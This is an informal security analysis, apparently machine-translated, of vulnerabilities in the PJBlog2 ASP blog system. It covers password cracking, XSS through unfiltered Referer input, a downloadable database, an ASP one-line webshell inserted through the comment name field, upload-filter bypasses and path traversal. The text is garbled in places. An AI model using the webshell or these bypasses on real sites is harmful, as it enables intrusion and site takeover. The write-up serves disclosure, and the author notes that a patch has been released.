PJBlog Security Analysis

PJBlog2 is a free ASP + Access personal blog system developed by PuterJam. In the past few days, I want to get a blog to play with it. PJBlog2 has relatively good functions and interfaces. After a trial, I feel that this blog is not bad, but I also found several small security issues. I just sent out some of my insights. My analysis version is PJBlog2 v2.4.1211 released on July 5, December 11.

I. cryptographic algorithms
PJBlog2 uses the SHA1 algorithm instead of the common MD5 Algorithm to encrypt user passwords. Similar to MD5, SHA1 is also a one-way hash function. However, it processes data of any length and outputs a value of 160 bits.
PJBlog2 will randomly generate a six-character string Salt when creating a new user. The user's plaintext password is added with the Salt value and then hashed to obtain the encrypted password. Password = SHA1 (user_pwd & Salt ). The benefit of doing so is that even two identical passwords have different hash results. This slightly "alternative" algorithm makes it difficult to crack the password.
Haha, the difficulty is not equivalent to not being able to crack. There are no ready-made programs on the Internet. You need to write one by yourself. Because. NET provides SHA1 classes, it was originally written in VB. Net. Since the resource consumption problem cannot be solved, it had to change to C. Using C to achieve SHA1 source code I found for a long time in a foreigner station to find, not bad, hehe, interested can look at the SHA1 class foreigners: http://www.codeproject.com/cpp/csha1.asp
The program can be downloaded here (http://www.0x54.org/lake2/program/PJBlogCracker.exe), is the command line, the function is relatively weak, the speed of a single thread is super slow, there may be bugs, many problems and then change it later.

Ii. login authentication
PJBlog2 uses Cookies and IP addresses for authentication. When the user logs in successfully, the system generates a random Hashkey to write the Cookies to the database, and then judges the user through the Hashkey, Username, and IP in the Cookies. Cookies are easy to handle and can be obtained through cross-site and offline databases. This IP address is hard to handle. It seems that there is little possibility of cookie spoofing. Well, that's not the case.

3. Loose filtering in a few places
The first is that the referer Filtering for statistics access is lax. See:

Copy codeCode: Guest_Refer = Trim (Request. ServerVariables ("HTTP_REFERER "))
Conn. exeCute ("insert into blog_Counter (coun_IP, coun_ OS, coun_Browser, coun_Referer) VALUES ('" & Guest_IP & "', '" & Guest_Browser (1 )&"', '"& Guest_Browser (0) &"', '"& CheckStr (Guest_Refer )&"')")

Haha, just filter the referer and check it with CheckStr. Check the CheckStr code:Copy codeThe Code is as follows: '*************************************
'Filter special characters
'*************************************
Function CheckStr (byVal ChkStr)
Dim Str: Str = ChkStr
Str = Trim (Str)
If IsNull (Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace (Str ,"&","&")
Str = Replace (Str ,"'","'")
Str = Replace (Str ,"""",""")
Dim re
Set re = new RegExp
Re. IgnoreCase = True
Re. Global = True
Re. Pattern = "(w) (here )"
Str = re. replace (Str, "$1 here ")
Re. Pattern = "(s) (elect )"
Str = re. replace (Str, "$1 elect ")
Re. Pattern = "(I) (nsert )"
Str = re. replace (Str, "$1 nsert ")
Re. Pattern = "(c) (reate )"
Str = re. replace (Str, "$1 reate ")
Re. Pattern = "(d) (rop )"
Str = re. replace (Str, "$ 1rop ")
Re. Pattern = "(a) (lter )"
Str = re. replace (Str, "$1 lter ")
Re. Pattern = "(d) (elete )"
Str = re. replace (Str, "$1 elete ")
Re. Pattern = "(u) (pdate )"
Str = re. replace (Str, "$1 pdate ")
Re. Pattern = "(\ s) (or )"
Str = re. replace (Str, "$ 1or ")
Set re = Nothing
CheckStr = Str
End Function

Single quotes, double quotes, and connectors are filtered, but the most important "<" and ">" are not filtered. The cross-site scripting attack is useful again. Note that only the first 40 characters are displayed on the page.
The second is that the user name entered by the visitor comment is also filtered using CheckStr. the user name database has a limit of 24 characters. It is more difficult to construct CSS here, but it can be of other use, the following is a detailed description.
Some blog owners prohibit comments from visitors, so they have to register and comment again. However, after registration, the Comment Name text box is set to the Registration Name and read-only. What should I do? You can submit data externally.
The other is the blog message board plug-in, or the user name is not properly filtered, which is more difficult to use, with only 20 characters.

Iv. Database Problems
The default database name of PJBlog2 is pblog. asp. Although the database has a blog_Notdownload table that looks like anti-download, visit the database and try it. You can download it.
Since it can be downloaded, you can insert asp code to run it. In some places (such as the comments of visitors), asp code insertion will be torn off. I don't know why, so I am depressed.
The ASP code can be inserted in the name of the comment. As mentioned above, the filtering is not strict here, so that asp inserted into the database will not be displayed. What I see is that a guy with no name is chatting. This should be well constructed. It should be 24 characters long and "filtered". I thought about it and found a shortest, exactly 24 characters: <% eval request (chr (9) %>
The content of the message board can also be inserted with asp code, but the administrator can see it when reading the message.
Oh, of course, most webmasters should change the database name, but during the test, we still find that a few people do not change the name ......

5. upload files
For security reasons, PJBlog2 limits the types of uploaded files, including asp, asa, aspx, cer, cdx, and htr. In fact, many virtual hosts not only support asp, but also support aspx, php, and perl, and can also upload shtml and other formats, therefore, it is best to limit the types of execution files on all servers.
For more information about uploading files, see the code in attachment. asp:Copy codeThe Code is as follows: Dim F_File, F_Type
Set F_File = FileUP. File ("File ")
F_Name = randomStr (1) & Year (now) & Month (now) & Day (now) & Hour (now) & Minute (now) & Second (now )&". "& F_File.FileExt
F_Type = FixName (F_File.FileExt)
IF F_File.FileSize> Int (UP_FileSize) Then
Response. write ("<div style =" "padding: 6px" "> <a href = 'attachment. asp '> the file size exceeds. Please return and upload again </a> </div> ")
ElseIF IsvalidFile (UCase (F_Type) = False Then
Response. write ("<div style =" "padding: 6px" "> <a href = 'attachment. asp '> the file format is invalid. Upload the file again. </a> </div> ")
Else
F_File.SaveAs Server. MapPath ("attachments/" & D_Name & "/" & F_Name)
Response. write "<script> addUploadItem ('" & F_Type & "', 'attachments/" & D_Name & "/" & F_Name & "'," & Request. queryString ("MSave") & ") </script>"
Response. write ("<div style =" "padding: 6px" "> <a href = 'attachment. asp '> the file is uploaded successfully. Please return to continue uploading </a> </div> ")
End IF

The suffix of the file to be saved is F_File.FileExt, And the suffix processed by the FixName () function is checked. Let's look at the fixname function definition in function. asp:Copy codeThe Code is as follows: '*************************************
'Filter file name
'*************************************
Function FixName (UpFileExt)
If IsEmpty (UpFileExt) Then Exit Function
FixName = Ucase (UpFileExt)
FixName = Replace (FixName, Chr (0 ),"")
FixName = Replace (FixName ,".","")
FixName = Replace (FixName, "ASP ","")
FixName = Replace (FixName, "ASA ","")
FixName = Replace (FixName, "ASPX ","")
FixName = Replace (FixName, "CER ","")
FixName = Replace (FixName, "CDX ","")
FixName = Replace (FixName, "HTR ","")
End Function

Haha, it filters out dangerous suffixes. If my file suffix is asp (0x00) gif, filter chr (0) and asp during the check, the suffix becomes a gif. It is saved as an asp (0x00) gif. Theoretically, it's right. I can't do it after a long time, so I'm depressed. Let me know.
However, we can use the uploaded aspx format. Haha, we uploaded the aspx file, and the fixname function filtered asp, so the suffix became x. You only need to set x to the format that can be uploaded, and then you can upload the aspx file.

Vi. Attachment management issues
The Administrator has an attachment management function after logging on to the system. The parameters are similar to http: // localhost/blog/ConContent. asp? Fmenu = SQLFile & Smenu = Attachments & AttPath = attachments/month_0512. You can specify AttPath to browse the web directory.
However, the system restricts the submission of data outside the site, so you cannot directly change the url. Find the link adding function, fill in the url we constructed, save it, and click View to bypass the restrictions outside the site. Note that the first character of the constructed AttPath cannot be "." or "/". Check the program. In this way, we can jump to the blog root directory: http: // localhost/blog/ConContent. asp? Fmenu = SQLFile & Smenu = Attachments & AttPath = attachments /..

In the end, I hope you can support PJBlog2, which is really useful. I hope that the author will make persistent efforts to make this blog system better and benefit many Internet users.
PS: the author is very diligent. The patch has come out.